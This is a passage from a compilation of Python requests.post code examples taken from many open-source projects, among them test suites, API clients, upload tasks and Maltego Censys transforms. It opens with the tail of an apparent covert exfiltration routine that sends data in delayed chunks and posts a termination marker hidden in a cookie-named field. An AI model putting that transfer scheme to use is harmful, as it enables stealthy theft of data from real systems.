		current_chunk += 1
		sys.stdout.write(".")
		time.sleep(time_delay)
	sys.stdout.write(".\n")

	# Termination packet
	data = DATA_END + str(current_chunk)
	payload = {TERMINATION_COOKIE: data}
	requests.post(addr, data=json.dumps(payload), headers=HEADERS)
	sys.stdout.write("[+] Sent termination packets and total of %s packets.\n" % current_chunk)

	return 0

Example 12

Project: home-assistant Source File: test_api.py
    def test_api_event_forward(self):
        """Test setting up event forwarding."""
        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({'host': '127.0.0.1'}),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({'api_password': 'bla-di-bla'}),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'api_password': 'bla-di-bla',
                'host': '127.0.0.1',
                'port': 'abcd'
                }),
            headers=HA_HEADERS)
        self.assertEqual(422, req.status_code)

        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'api_password': 'bla-di-bla',
                'host': '127.0.0.1',
                'port': get_test_instance_port()
                }),
            headers=HA_HEADERS)
        self.assertEqual(422, req.status_code)

        # Setup a real one
        req = requests.post(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'api_password': API_PASSWORD,
                'host': '127.0.0.1',
                'port': SERVER_PORT
                }),
            headers=HA_HEADERS)
        self.assertEqual(200, req.status_code)

        # Delete it again..
        req = requests.delete(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({}),
            headers=HA_HEADERS)
        self.assertEqual(400, req.status_code)

        req = requests.delete(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'host': '127.0.0.1',
                'port': 'abcd'
                }),
            headers=HA_HEADERS)
        self.assertEqual(422, req.status_code)

        req = requests.delete(
            _url(const.URL_API_EVENT_FORWARD),
            data=json.dumps({
                'host': '127.0.0.1',
                'port': SERVER_PORT
                }),
            headers=HA_HEADERS)
        self.assertEqual(200, req.status_code)

Example 13

Project: dd-agent Source File: test_transaction.py
    def testEndpoints(self):
        """
        Tests that the logic behind the agent version specific endpoints is ok.
        Also tests that these endpoints actually exist.
        """
        MetricTransaction._endpoints = []
        api_key = "a" * 32
        config = {
            "endpoints": {"https://app.datadoghq.com": [api_key]},
            "dd_url": "https://app.datadoghq.com",
            "api_key": api_key,
            "use_dd": True
        }

        app = Application()
        app.skip_ssl_validation = False
        app._agentConfig = config
        app.use_simple_http_client = True

        trManager = TransactionManager(timedelta(seconds=0), MAX_QUEUE_SIZE,
                                       THROTTLING_DELAY, max_endpoint_errors=100)
        trManager._flush_without_ioloop = True  # Use blocking API to emulate tornado ioloop
        MetricTransaction._trManager = trManager
        MetricTransaction.set_application(app)
        MetricTransaction.set_endpoints(config['endpoints'])

        transaction = MetricTransaction(None, {}, "")
        endpoints = []
        for endpoint in transaction._endpoints:
            for api_key in transaction._endpoints[endpoint]:
                endpoints.append(transaction.get_url(endpoint, api_key))
        expected = ['https://{0}-app.agent.datadoghq.com/intake/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Metric Transaction
        transaction = APIMetricTransaction(None, {})
        endpoints = []
        for endpoint in transaction._endpoints:
            for api_key in transaction._endpoints[endpoint]:
                endpoints.append(transaction.get_url(endpoint, api_key))
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/series/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Service Check Transaction
        APIServiceCheckTransaction._trManager = trManager
        APIServiceCheckTransaction.set_application(app)
        APIServiceCheckTransaction.set_endpoints(config['endpoints'])

        transaction = APIServiceCheckTransaction(None, {})
        endpoints = []
        for endpoint in transaction._endpoints:
            for api_key in transaction._endpoints[endpoint]:
                endpoints.append(transaction.get_url(endpoint, api_key))
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/check_run/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({'check': 'test', 'status': 0}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

Example 14

Project: HTTPretty Source File: test_requests.py
@httprettified
@within(five=microseconds)
def test_streaming_responses(now):
    """
    Mock a streaming HTTP response, like those returned by the Twitter streaming
    API.
    """
    from contextlib import contextmanager

    @contextmanager
    def in_time(time, message):
        """
        A context manager that uses signals to force a time limit in tests
        (unlike the `@within` decorator, which only complains afterward), or
        raise an AssertionError.
        """
        import signal

        def handler(signum, frame):
            raise AssertionError(message)
        signal.signal(signal.SIGALRM, handler)
        signal.setitimer(signal.ITIMER_REAL, time)
        yield
        signal.setitimer(signal.ITIMER_REAL, 0)

    #XXX this obviously isn't a fully functional twitter streaming client!
    twitter_response_lines = [
        b'{"text":"If \\"for the boobs\\" requests to follow me one more time I\'m calling the police. http://t.co/a0mDEAD8"}\r\n',
        b'\r\n',
        b'{"text":"RT @onedirection: Thanks for all your #FollowMe1D requests Directioners! We\u2019ll be following 10 people throughout the day starting NOW. G ..."}\r\n'
    ]

    TWITTER_STREAMING_URL = "https://stream.twitter.com/1/statuses/filter.json"

    HTTPretty.register_uri(HTTPretty.POST, TWITTER_STREAMING_URL,
                           body=(l for l in twitter_response_lines),
                           streaming=True)

    # taken from the requests docs
    # Http://docs.python-requests.org/en/latest/user/advanced/#streaming-requests
    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                             auth=('username', 'password'), stream=True)

    #test iterating by line
    line_iter = response.iter_lines()
    with in_time(0.01, 'Iterating by line is taking forever!'):
        for i in xrange(len(twitter_response_lines)):
            expect(next(line_iter).strip()).to.equal(
                twitter_response_lines[i].strip())

    #test iterating by line after a second request
    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                            auth=('username', 'password'), stream=True)

    line_iter = response.iter_lines()
    with in_time(0.01, 'Iterating by line is taking forever the second time '
                       'around!'):
        for i in xrange(len(twitter_response_lines)):
            expect(next(line_iter).strip()).to.equal(
                twitter_response_lines[i].strip())

    #test iterating by char
    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                            auth=('username', 'password'), stream=True)

    twitter_expected_response_body = b''.join(twitter_response_lines)
    with in_time(0.02, 'Iterating by char is taking forever!'):
        twitter_body = b''.join(c for c in response.iter_content(chunk_size=1))

    expect(twitter_body).to.equal(twitter_expected_response_body)

    #test iterating by chunks larger than the stream

    response = requests.post(TWITTER_STREAMING_URL, data={'track': 'requests'},
                             auth=('username', 'password'), stream=True)

    with in_time(0.02, 'Iterating by large chunks is taking forever!'):
        twitter_body = b''.join(c for c in
                                response.iter_content(chunk_size=1024))

    expect(twitter_body).to.equal(twitter_expected_response_body)

Example 15

Project: spreads Source File: tasks.py
@task_queue.task()
def upload_workflow(wf_id, base_path, endpoint, user_config,
                    start_process=False, start_output=False):
    logger.debug("Uploading workflow to postprocessing server")

    workflow = Workflow.find_by_id(base_path, wf_id)
    # NOTE: This is kind of nasty.... We temporarily write the user-supplied
    # configuration to the bag, update the tag-payload, create the zip, and
    # once everything is done, we restore the old version
    tmp_cfg = copy.deepcopy(workflow.config)
    tmp_cfg.set(user_config)
    tmp_cfg_path = workflow.path/'config.yml'
    tmp_cfg.dump(filename=unicode(tmp_cfg_path),
                 sections=(user_config['plugins'] + ["plugins", "device"]))
    workflow.bag.add_tagfiles(unicode(tmp_cfg_path))

    # Create a zipstream from the workflow-bag
    zstream = workflow.bag.package_as_zipstream(compression=None)
    zsize = calculate_zipsize(zstream.paths_to_write)

    def zstream_wrapper():
        """ Wrapper around our zstream so we can emit a signal when all data
        has been streamed to the client.
        """
        transferred = 0
        progress = "0.00"
        for data in zstream:
            yield data
            transferred += len(data)
            # Only update progress if we've progress at least by 0.01
            new_progress = "{0:.2f}".format(transferred/zsize)
            if new_progress != progress:
                progress = new_progress
                signals['submit:progressed'].send(
                    workflow, progress=float(progress),
                    status="Uploading workflow...")

    # NOTE: This is neccessary since requests makes a chunked upload when
    #       passed a plain generator, which is not supported by the WSGI
    #       protocol that receives it. Hence we wrap it inside of a
    #       GeneratorIO to make it appear as a file-like object with a
    #       known size.
    zstream_fp = GeneratorIO(zstream_wrapper(), zsize)
    logger.debug("Projected size for upload: {}".format(zsize))
    signals['submit:started'].send(workflow)
    resp = requests.post(endpoint, data=zstream_fp,
                         headers={'Content-Type': 'application/zip'})
    if not resp:
        error_msg = "Upload failed: {0}".format(resp.content)
        signals['submit:error'].send(workflow, message=error_msg,
                                     data=resp.content)
        logger.error(error_msg)
    else:
        wfid = resp.json()['id']
        if start_process:
            requests.post(endpoint + "/{0}/process".format(wfid))
        if start_output:
            requests.post(endpoint + "/{0}/output".format(wfid))
        signals['submit:completed'].send(workflow, remote_id=wfid)

    # Restore our old configuration
    workflow._save_config()

Example 16

Project: contrail-neutron-plugin Source File: contrail_plugin.py
    def _request_api_server(self, url, data=None, headers=None):
        # Attempt to post to Api-Server
        if self._apiinsecure:
             response = requests.post(url, data=data, headers=headers,verify=False)
        elif not self._apiinsecure and self._use_api_certs:
             response = requests.post(url, data=data, headers=headers,verify=self._apicertbundle)
        else:
             response = requests.post(url, data=data, headers=headers)
        if (response.status_code == requests.codes.unauthorized):
            # Get token from keystone and save it for next request
            if self._ksinsecure:
               response = requests.post(self._keystone_url,
                                        data=self._authn_body,
                                        headers={'Content-type': 'application/json'},verify=False)
            elif not self._ksinsecure and self._use_ks_certs:
               response = requests.post(self._keystone_url,
                                        data=self._authn_body,
                                        headers={'Content-type': 'application/json'},verify=self._kscertbundle)
            else:
               response = requests.post(self._keystone_url,
                                        data=self._authn_body,
                                        headers={'Content-type': 'application/json'})
            if (response.status_code == requests.codes.ok):
                # plan is to re-issue original request with new token
                auth_headers = headers or {}
                authn_content = json.loads(response.text)
                self._authn_token = authn_content['access']['token']['id']
                auth_headers['X-AUTH-TOKEN'] = self._authn_token
                response = self._request_api_server(url, data, auth_headers)
            else:
                raise RuntimeError('Authentication Failure')
        return response

Example 17

Project: ANALYSE Source File: release.py
Function: create_github_creds
def create_github_creds():
    """
    https://developer.github.com/v3/oauth_authorizations/#create-a-new-authorization
    """
    headers = {"User-Agent": "edx-release"}
    payload = {"note": "edx-release"}
    username = raw_input("Github username: ")
    password = getpass.getpass("Github password: ")
    response = requests.post(
        "https://api.github.com/authorizations",
        auth=(username, password),
        headers=headers, data=json.dumps(payload),
    )
    # is the user using two-factor authentication?
    otp_header = response.headers.get("X-GitHub-OTP")
    if not response.ok and otp_header and otp_header.startswith("required;"):
        # get two-factor code, redo the request
        headers["X-GitHub-OTP"] = raw_input("Two-factor authentication code: ")
        response = requests.post(
            "https://api.github.com/authorizations",
            auth=(username, password),
            headers=headers, data=json.dumps(payload),
        )
    if not response.ok:
        message = response.json()["message"]
        if message != "Validation Failed":
            raise requests.exceptions.RequestException(message)
        else:
            # A token called "edx-release" already exists on Github.
            # Delete it, and try again.
            token_id = get_github_auth_id(username, password, "edx-release")
            if token_id:
                delete_github_auth_token(username, password, token_id)
            response = requests.post(
                "https://api.github.com/authorizations",
                auth=(username, password),
                headers=headers, data=json.dumps(payload),
            )
    if not response.ok:
        message = response.json()["message"]
        raise requests.exceptions.RequestException(message)

    return (username, response.json()["token"])

Example 18

Project: silo.pub Source File: tumblr.py
def publish(site):
    auth = OAuth1(
        client_key=current_app.config['TUMBLR_CLIENT_KEY'],
        client_secret=current_app.config['TUMBLR_CLIENT_SECRET'],
        resource_owner_key=site.account.token,
        resource_owner_secret=site.account.token_secret)

    create_post_url = CREATE_POST_URL.format(site.domain)
    photo_url = util.get_first(util.get_possible_array_value(request.form, 'photo'))
    photo_file = util.get_first(util.get_possible_array_value(request.files, 'photo'))

    if photo_url:
        data = util.trim_nulls({
            'type': 'photo',
            'slug': request.form.get('slug'),
            'caption': request.form.get('content[html]') or
            request.form.get('content') or request.form.get('name') or
            request.form.get('summary'),
            'source': photo_url
        })
        r = requests.post(create_post_url, data=data, auth=auth)

    elif photo_file:
        # tumblr signs multipart in a weird way. first sign the request as if
        # it's application/x-www-form-urlencoded, then recreate the request as
        # multipart but use the signed headers from before. Mostly cribbed from
        # https://github.com/tumblr/pytumblr/blob/\
        # 20e7e38ba6f0734335deee64d4cae45fa8a2ce90/pytumblr/request.py#L101

        # The API docuementation and some of the code samples gave me the
        # impression that you could also send files just as part of the
        # form-encoded data but I couldnit make it work
        # https://www.tumblr.com/docs/en/api/v2#pphoto-posts
        # https://gist.github.com/codingjester/1649885#file-upload-php-L56
        data = util.trim_nulls({
            'type': 'photo',
            'slug': request.form.get('slug'),
            'caption': request.form.get('content[html]') or
            request.form.get('content') or request.form.get('name') or
            request.form.get('summary'),
        })
        fake_req = requests.Request('POST', create_post_url, data=data)
        fake_req = fake_req.prepare()
        auth(fake_req)

        real_headers = dict(fake_req.headers)

        # manually strip these, requests will recalculate them for us
        del real_headers['Content-Type']
        del real_headers['Content-Length']

        current_app.logger.info(
            'uploading photo to tumblr %s, headers=%r',
            create_post_url, real_headers)
        r = requests.post(create_post_url, data=data, files={
            'data': photo_file,
        }, headers=real_headers)

    else:
        data = util.trim_nulls({
            # one of: text, photo, quote, link, chat, audio, video
            'type': 'text',
            'slug': request.form.get('slug'),
            'title': request.form.get('name'),
            'body': util.get_complex_content(request.form),
        })
        current_app.logger.info(
            'posting to tumblr %s, data=%r', create_post_url, data)
        r = requests.post(create_post_url, data=data, auth=auth)

    current_app.logger.info(
        'response from tumblr %r, data=%r, headers=%r',
        r, r.content, r.headers)

    if r.status_code // 100 != 2:
        current_app.logger.warn(
            'Tumblr publish failed with response %s', r.text)
        return util.wrap_silo_error_response(r)

    location = None
    if 'Location' in r.headers:
        location = r.headers['Location']
    else:
        # only get back the id, look up the url
        post_id = r.json().get('response').get('id')
        r = requests.get(FETCH_POST_URL.format(site.domain), params={
            'api_key': current_app.config['TUMBLR_CLIENT_KEY'],
            'id': post_id,
        })
        if r.status_code // 100 == 2:
            posts = r.json().get('response', {}).get('posts', [])
            if posts:
                location = posts[0].get('post_url')

    return util.make_publish_success_response(location)

Example 19

Project: manila Source File: jsonrpc.py
    @utils.synchronized('quobyte-request')
    def call(self, method_name, user_parameters):
        # prepare request
        self._id += 1
        parameters = {'retry': 'INFINITELY'}  # Backend specific setting
        if user_parameters:
            parameters.update(user_parameters)
        post_data = {
            'jsonrpc': '2.0',
            'method': method_name,
            'params': parameters,
            'id': six.text_type(self._id),
        }
        LOG.debug("Request payload to be send is: %s",
                  jsonutils.dumps(post_data))

        # send request
        if self._url_scheme == 'https':
            if self._cert_file:
                result = requests.post(url=self._url,
                                       json=post_data,
                                       auth=self._credentials,
                                       verify=self._ca_file,
                                       cert=(self._cert_file, self._key_file))
            else:
                result = requests.post(url=self._url,
                                       json=post_data,
                                       auth=self._credentials,
                                       verify=self._ca_file)
        else:
            result = requests.post(url=self._url,
                                   json=post_data,
                                   auth=self._credentials)

        # eval request response
        if result.status_code == codes['OK']:
            LOG.debug("Retrieved data from Quobyte backend: %s", result.text)
            response = result.json()
            return self._checked_for_application_error(response)

        # If things did not work out provide error info
        LOG.debug("Backend request resulted in error: %s" % result.text)
        result.raise_for_status()

Example 20

Project: maltego_censys Source File: censys_ip_to_cert.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    ip = sys.argv[3]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': 'ip: {ip}'.format(ip=ip), 'fields': ['443.https.tls.certificate.parsed.fingerprint_sha1',
                                                           '443.https.tls.certificate.parsed.issuer_dn',
                                                           '443.https.tls.certificate.parsed.subject_dn',
                                                           'updated_at'], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                parse_results(results['results'], mt)
                if pages > 1 > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if pages < 5 > 1:
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
            else:
                mt.addUIMessage("No SSL certs were found on this ip: {ip}".format(ip=ip))
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No SSL certs were found on this ip: {ip}".format(ip=ip))
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()

    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 21

Project: maltego_censys Source File: censys_cert_to_ip.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    sha1 = sys.argv[3]
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': '443.https.tls.certificate.parsed.fingerprint_sha1: {s}'.format(s=sha1),
             'fields': ['ip', '443.https.tls.certificate.parsed.subject.common_name.raw',
                        '443.https.tls.certificate.parsed.issuer.common_name.raw', 'updated_at'], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                process_results(results['results'], mt)
                if pages > 1 > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                process_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if pages < 5 > 1:
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                process_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No info found")
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
            else:
                mt.addUIMessage("No IP addresses found with this ssl cert")
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No info found")
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()
    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 22

Project: SickRage Source File: requests_transport.py
    def request(self, host, handler, request_body, verbose=0):
        """Replace the xmlrpc request function.

        Process xmlrpc request via requests library.

        Args:
            host: Target host
            handler: Target PRC handler.
            request_body: XML-RPC request body.
            verbose: Debugging flag.

        Returns:
            Parsed response.

        Raises:
            RequestException: Error in requests
        """
        if verbose:
            self._debug()

        if not self._check_ssl_cert:
            disable_warnings()

        headers = {'User-Agent': self.user_agent, 'Content-Type': 'text/xml', }

        # Need to be done because the schema(http or https) is lost in
        # xmlrpc.Transport's init.
        if self._use_https:
            url = "https://{host}/{handler}".format(host=host, handler=handler)
        else:
            url = "http://{host}/{handler}".format(host=host, handler=handler)

        # TODO Construct kwargs query instead
        try:
            if self._authtype == "basic":
                response = requests.post(
                    url,
                    data=request_body,
                    headers=headers,
                    verify=self._check_ssl_cert,
                    auth=HTTPBasicAuth(
                        self._username, self._password),
                    proxies=self._proxies)
            elif self._authtype == "digest":
                response = requests.post(
                    url,
                    data=request_body,
                    headers=headers,
                    verify=self._check_ssl_cert,
                    auth=HTTPDigestAuth(
                        self._username, self._password),
                    proxies=self._proxies)
            else:
                response = requests.post(
                    url,
                    data=request_body,
                    headers=headers,
                    verify=self._check_ssl_cert,
                    proxies=self._proxies)

            response.raise_for_status()
        except RequestException as error:
            raise xmlrpc_client.ProtocolError(url,
                                              error.message,
                                              traceback.format_exc(),
                                              response.headers)

        return self.parse_response(response)

Example 23

Project: mining Source File: build_admin.py
def build(level=0):
    demo_path = os.path.abspath(os.path.dirname(__file__))
    try:
        os.remove(os.path.join(demo_path, 'demo.db'))
    except OSError:
        pass
    conn = sqlite3.connect('{}'.format(os.path.join(demo_path, 'demo.db')))
    cur = conn.cursor()
    f = open('{}'.format(os.path.join(demo_path, 'base.sql')), 'r')
    sql_str = f.read()
    print 'INSERT SQLITE DATA'
    cur.executescript(sql_str)
    conn.commit()
    f.close()
    if level > 0:
        l = open(os.path.join(demo_path, 'people.sql'), 'r').read()
        print 'INSERT SQLITE DATA LEVEL {}'.format(level)
        for i in xrange(level):
            cur.executescript(l)
            conn.commit()
            print "LEVEL {} COMMIT".format(i)
    cur.close()

    url_api = {
        'user': "http://127.0.0.1:8888/api/user",
        'connection': "http://127.0.0.1:8888/api/connection",
        'cube': "http://127.0.0.1:8888/api/cube",
        'element': "http://127.0.0.1:8888/api/element",
        'dashboard': "http://127.0.0.1:8888/api/dashboard"
    }
    data = {
        'user': {'username': 'admin', 'password': 'admin', 'rule': 'root'},
        'connection': {
            "connection": 'sqlite:///{}'.format(
                os.path.join(demo_path, 'demo.db')),
            "name": "DEMO"
        },
        'cube': [
            {
                "status": False,
                "run": False,
                "name": "Sales",
                "slug": "sales",
                "connection": "demo",
                "sql": "select * from SALE;",
                "scheduler_status": False,
                "type": "relational"
            },
            {
                "status": False,
                "run": False,
                "name": "People",
                "slug": "people",
                "connection": "demo",
                "sql": "select * from people;",
                "scheduler_status": False,
                "type": "relational"
            },
            {
                "status": False,
                "run": False,
                "name": "Product Sales",
                "slug": "product-sales",
                "connection": "demo",
                "sql": "select * from SALE_PRODUCT;",
                "scheduler_status": False,
                "type": "relational"
            },
            {
                "status": False,
                "run": False,
                "name": "Sales by month",
                "slug": "sales-by-month",
                "connection": "demo",
                "sql": "SELECT  strftime('%Y-%m', sale_at) as month, SUM(value) \
                        as total\nFROM    sale\n\
                        GROUP BY strftime('%Y-%m', sale_at)",
                "scheduler_status": False,
                "type": "relational",
                "slug": "sales-by-month"
            }
        ],
        'element': [
            {
                "alias": {

                },
                "cube": "people",
                "field_serie": None,
                "field_x": None,
                "field_y": None,
                "name": "People Grid",
                "orderby": [
                    "full_name"
                ],
                "orderby__order": [
                    "1"
                ],
                "scheduler_status": False,
                "show_fields": [
                    "id_people",
                    "full_name",
                    "gender",
                    "age",
                    "country",
                    "created_at"
                ],
                "type": "grid",
                "widgets": [
                    {
                        "field": "country",
                        "type": "distinct",
                        "label": "Country"
                    }
                ]
            },
            {
                "alias": {

                },
                "cube": "sales-by-month",
                "field_serie": None,
                "field_x": "month",
                "field_y": "total",
                "name": "Sales Bar",
                "scheduler_status": False,
                "show_fields": [
                    "month",
                    "total"
                ],
                "type": "chart_bar"
            },
            {
                "orderby": [
                    "sale_at"
                ],
                "cube": "sales",
                "name": "Sales Grid",
                "show_fields": [
                    "id_sale",
                    "id_people",
                    "value",
                    "paid",
                    "sale_at"
                ],
                "widgets": [],
                "alias": {

                },
                "field_x": None,
                "field_y": None,
                "scheduler_status": False,
                "orderby__order": [
                    "0"
                ],
                "type": "grid",
                "field_serie": None
            }
        ],
        'dashboard': {
            "scheduler_status": False,
            "element": [
                {
                    "id": "people-grid",
                    "label": "People Grid"
                },
                {
                    "id": "sales-bar",
                    "label": "Sales Bar"
                },
                {
                    "id": "sales-grid",
                    "label": "Sales Grid"
                }
            ],
            "slug": "demo",
            "name": "Demo"
        }
    }

    headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
    print 'CREATE USER admin'
    requests.post(url_api.get('user'), data=json.dumps(data.get('user')),
                  headers=headers)
    print 'CREATE connection'
    requests.post(url_api.get('connection'),
                  data=json.dumps(data.get('connection')),
                  headers=headers)
    print 'CREATE cube'
    for cb in data.get('cube'):
        requests.post(url_api.get('cube'), data=json.dumps(cb),
                      headers=headers)
        print 'RUNNING cube {}'.format(cb.get('slug'))
        process(cb)

    print 'CREATE element'
    for el in data.get('element'):
        print '--> {}'.format(el.get('name'))
        requests.post(url_api.get('element'), data=json.dumps(el),
                      headers=headers)

    print 'CREATE dashboard'
    requests.post(url_api.get('dashboard'),
                  data=json.dumps(data.get('dashboard')),
                  headers=headers)

Example 24

Project: zenodo Source File: upload.py
Function: upload
def upload(token, metadata, files, publish=True):
    """Make an upload."""
    base_url = 'http://localhost:5000/api/deposit/depositions'
    auth = {
        'Authorization': 'Bearer {0}'.format(token)
    }
    auth_json = {
        'Content-Type': 'application/json',
        'Accept': 'application/json',
    }
    auth_json.update(auth)

    r = requests.post(base_url, data='{}', headers=auth_json)
    assert r.status_code == 201
    links = r.json()['links']
    print('Create deposit:')
    print(r.json())
    # Wait for ES to index.
    sleep(1)

    for filename, stream in files:
        r = requests.post(
            links['files'],
            data=dict(filename=filename),
            files=dict(file=stream),
            headers=auth)
        assert r.status_code == 201
        print('Upload file:')
        print(r.json())

    r = requests.put(
        links['self'],
        data=json.dumps(dict(metadata=metadata)),
        headers=auth_json
    )
    assert r.status_code == 200
    print('Update metadata:')
    print(r.json())

    if publish:
        r = requests.post(links['publish'], headers=auth)
        assert r.status_code == 202
        print('Publish:')
        print(r.json())

    return r.json()['id']

Example 25

Project: maltego_censys Source File: censys_subject_cn_to_sha1.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    cn = sys.argv[3]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': '443.https.tls.certificate.parsed.subject.common_name.raw: {cn}'.format(cn=cn), 'fields':
             ['443.https.tls.certificate.parsed.fingerprint_sha1', '443.https.tls.certificate.parsed.issuer_dn',
              '443.https.tls.certificate.parsed.subject_dn', 'updated_at'], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                parse_results(results['results'], mt)
                if pages > 4 > 1:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this subject cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if pages < 5 > 1:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this subject cn {cn}".format(cn=cn))
